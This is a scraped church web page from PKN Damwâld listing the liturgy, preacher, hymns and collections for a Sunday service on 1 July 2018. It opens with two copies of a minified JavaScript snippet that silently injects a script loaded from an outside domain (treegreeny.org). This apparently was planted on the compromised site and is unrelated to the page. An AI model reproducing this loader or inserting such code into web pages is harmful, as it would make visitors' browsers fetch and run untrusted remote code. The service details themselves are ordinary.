;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 1 juli 2018 9:30 uur - PKN Damwâld
zondag 1 juli 2018
09:30 uur

Kerkdienst zondag 1 juli 2018 9:30 uur

Thema: Voorbereiding Heilig Avondmaal

Informatie

Voorganger:Mw. R. van der Wal-Van Akker, Morra
Thema:Voorbereiding Heilig Avondmaal
Liturgie
Lied voor de dienst : Psalm 150
Welkom
We zingen: Psalm 63, 1e en 2e couplet
Stil gebed /Votum en groet
We zingen: Psalm 116, 1e en 2e couplet
We zingen: Kinderlied ELB 445
Lezing van het formulier
We zingen: gezang 363
Gebed
We lezen: Psalm 116
We zingen: Psalm 116, 5e, 6e en 8e
Verkondiging .
We zingen: gezang 358, 1e, 2e, 3e en 4e
Collecte
Dankgebed
Slotlied gezang 409, 1e, 2e, 3e en 4e
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Diaconie
Tweede collecte: Kerk
Uitganscollecte: Kerk